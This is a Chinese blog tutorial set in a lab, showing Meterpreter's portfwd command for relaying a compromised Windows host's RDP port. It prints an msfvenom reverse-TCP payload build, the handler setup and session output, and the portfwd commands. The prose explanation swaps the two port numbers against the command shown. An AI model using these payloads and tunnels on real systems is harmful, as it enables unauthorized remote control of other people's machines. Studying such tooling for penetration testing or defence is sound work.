Meterprete端口转发

最新推荐文章于 2023-11-30 18:12:04 发布
最新推荐文章于 2023-11-30 18:12:04 发布
阅读量457 收藏 1
点赞数 1
分类专栏: 笔记 文章标签: 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38409397/article/details/121134978
版权

Meterpreter中有一个命令,可以替代lcx,nc等来解决大部分端口转发问题
命令:portfwd
攻击机:kali 10.10.1.104
靶机:windowsxp 10.10.1.103
靶机打开3389端口方便验证

portfwd

拿到目标机的meterpreter shell 生成一个木马

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.104 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

在靶机上运行该shell 成功上线

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.1.104
lhost => 10.10.1.104
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 10.10.1.104:4444 
[*] Sending stage (180291 bytes) to 10.10.1.103
[*] Meterpreter session 1 opened (10.10.1.104:4444 -> 10.10.1.103:1043) at 2020-06-24 09:43:54 -0400

meterpreter >

使用portfwd进行转发, portfwd是meterpreter的一个网络命令,只能在meterpreter shell里面运行

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -R        Indicates a reverse port forward.
    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.
meterpreter >

下面开始转发

meterpreter > portfwd add -l 3389 -r 10.10.1.103 -p 23389
[*] Local TCP relay created: :3389 <-> 10.10.1.103:23389
meterpreter > portfwd 

Active Port Forwards
====================

   Index  Local         Remote             Direction
   -----  -----         ------             ---------
   1      0.0.0.0:3389  10.10.1.103:23389  Forward

1 total active port forwards.

meterpreter > 

portfwd add -l 23389 -r 10.10.1.103 -p 3389
这句话的意思是把远程主机的3389端口转发到本地的23389进行监听

连接本地23389端口,成功登陆

其他

列出端口转发条目
portfwd list

删除id为1的端口转发
portfwd delete -i 1

清空所有转发
portfwd flush
Y1nC00K13
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5584
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
window端口转发工具
03-31
windows好用的端口转发工具
msf之meterpreter权限绑定以及端口转发
qq_42526270的博客
10-10 2347
msf之meterpreter权限绑定以及端口转发 当目标系统成功运行我们配置好的 PAYLOAD ,我们就会在Kali的console界面,反弹取得 shell 。此时,我们要做的第一件事,就是将我们 PAYLOAD 的当前进程,转移注入到另外个可以维持我们持续权限的进程上! 首先ps查看系统的后台程序 选择一个常用的系统pid migrate pid来绑定进程,这里选择mysqld.exe...
Metasploit(MSF)使用详解
m0_74806866的博客
11-30 550
本篇文章通过一次渗透测试,向大家介绍关于Metasploit的使用、参数和渗透测试的应用
netsh端口转发监听meterpreter
hcufo的博客
05-15 182
一个简单监听练习
易语言端口转发
08-21
易语言端口转发源码系统结构:置数据,回调函数,转发线程,客户进入离开,进入列表,审核IP,检查黑名单,删除过期记录,取连接次数, ======窗口集1 || ||------_窗口1_创建完毕 || ||------_按钮3_被
c++端口转发工具,c++端口转发工具
11-14
在IT领域,端口转发是一种网络技术,它允许网络数据包从一个端口转发到另一个不同的端口,通常跨越不同的网络或设备。这种技术在多种场景下非常有用,例如访问受限制的网络服务、测试本地服务器或者保护隐私。在这个...
windows端口转发工具.zip
10-27
windows端口转发工具(3款)
kali之metasploit工具渗透案例 --- 小黑超细详解
G_WEB_Xie的博客
09-12 1756
metasploit简称(MSF),是kali的最强渗透工具之一,称之为能黑掉整个宇宙的工具。在之前的文章中详细介绍了MSF工具的使用以及各个模块的说明,这篇文章作为案例做一次详解。
第四期_Metasploit 基础(六)Meterprete《Metasploit Unleashed Simplified Chinese version(Metasploit官方文档教程中文版)》
Sno_WolF的博客
02-04 1250
四、METASPLOIT 基础 6. Meterpreter Meterpreter 是一种高级的、动态可扩展的有效负载,它使用内存中的 DLL 注入stagers并在运行时通过网络扩展。它通过stager程序套接字进行通信,并提供全面的客户端 Ruby API。它具有命令历史记录,选项卡完成,通道等功能。 Metepreter最初是由skape为Metasploit 2.x编写的,常见的扩展被合并到3.x中,目前正在对Metasploit 3.3进行大修。服务器部分以纯C语言实现,现在使用MSVC编译,使
Meterpreter基本用法
baynk的博客
04-27 3972
Meterpreter 接上篇,过不了CSDN。 Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程
Meterpreter命令详解
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5576
meterpreter使用攻略(持续更新中)
meterpreter详解与渗透实战
热门推荐
成长
01-24 3万+
payload介绍,meterpreter详解,以及网络渗透实战(拿下老爸电脑)
Meterpreter使用总结(1)
CODING...
02-08 2万+
meterpreter是我最喜欢使用的攻击payload,经常都会使用windows/meterpreter/reverse_tcp作为携带的payload来进行测试,下面就meterpreter的基本使用进行一个总结:
Meterpreter 简述
weixin_34277853的博客
09-30 281
Metasploit是Windows系统下的ShellCode—meterpreter!MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。exploit是指“漏洞及其利用”,其利用一切可以利用的工具、采取一切可以采取的方法、找到一切可...
metasploit后渗透入门--meterpreter
Yale的博客
01-14 3219
0x01利用漏洞拿到Meterpreter。 将存放在桌面上的exploit文件复制到metasploit系统指定的exploits存储路径中,并将exploit的属性设置为644. cp ~/Desktop/ms14_064_ole_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/browser/ chmod...
FPipe端口转发教程
最新发布
04-26
FPipe是一个用于端口转发的工具,它可以将网络流量从一个端口转发到另一个端口。以下是FPipe端口转发的基本教程: 1. 下载和安装FPipe:首先,你需要从FPipe的官方网站或其他可信来源下载并安装FPipe工具。 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值